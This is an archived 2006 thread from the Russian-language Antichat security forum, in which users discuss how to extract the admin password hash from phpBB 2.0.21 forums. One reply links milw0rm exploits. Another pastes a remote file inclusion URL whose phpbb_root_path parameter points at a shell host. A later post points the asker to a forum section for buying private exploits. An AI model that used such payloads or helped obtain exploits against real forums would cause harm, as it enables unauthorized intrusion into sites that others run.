ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
  #1  
Старый 25.10.2006, 14:48
oxigen
Новичок
Регистрация: 19.12.2005
Сообщений: 7
Провел на форуме:
12565

Репутация: 0
Arrow Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
Сейчас phpBB один из самых стабильных состем форумов.
Есть ли такие перцы кто всё же ломал последню версию?

Если не секрет то как? каким экспойтом, или чем-то другим?

Поделись - интересно.

Пробывали многие, но у кого получалось?
 

  #2  
Старый 25.10.2006, 15:01
rijy
Постоянный
Регистрация: 25.09.2006
Сообщений: 451
Провел на форуме:
2639641

Репутация: 1573
По умолчанию
multiple PHP application poison NULL byte vulnerability phpBB 2.0.21
http://milw0rm.com/exploits/2348

Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
http://milw0rm.com/exploits/2429

з.ы. сам пока не пробовал эту версию...
 

  #3  
Старый 25.10.2006, 20:21
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию
последний сплойт
Код:
Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
 

  #4  
Старый 27.10.2006, 05:00
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию
Цитата:
Сообщение от Brahma  
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
Неудивительно =)
Это файл от мода "Admin Topic Action Logging Mod" для phpbb. Сплоит если и будет работать, то только на форуме с этим модом

Цитата:
Сообщение от oxigen  
Есть ли такие перцы кто всё же ломал последню версию?
Если не секрет то как? каким экспойтом, или чем-то другим?
Поделись - интересно.
Насколько мне известно, такие перцы есть. И тут на ачате тоже. И совсем не секрет, чем они ломали - мозгами и руками. =)
Последний раз редактировалось syntacsis; 27.10.2006 в 05:13..
 

  #5  
Старый 27.10.2006, 16:44
oxigen
Новичок
Регистрация: 19.12.2005
Сообщений: 7
Провел на форуме:
12565

Репутация: 0
По умолчанию
syntacsis, дай плх их ники. Просто задать пару вопросов, ну или пусть сами отвят каким эксплойтом или снифером. Мне нужно знать чем, а уж как я разберусь.
Как ни как поиск рулит!
 

  #6  
Старый 27.10.2006, 19:07
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Цитата:
Сообщение от oxigen  
ну или пусть сами отвят каким эксплойтом или снифером
тут тебе этого не ответят ) ибо приват сплойты
Обратись в Роздел "покупка продажа" и напиши сплойт "для такой-то версии"
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ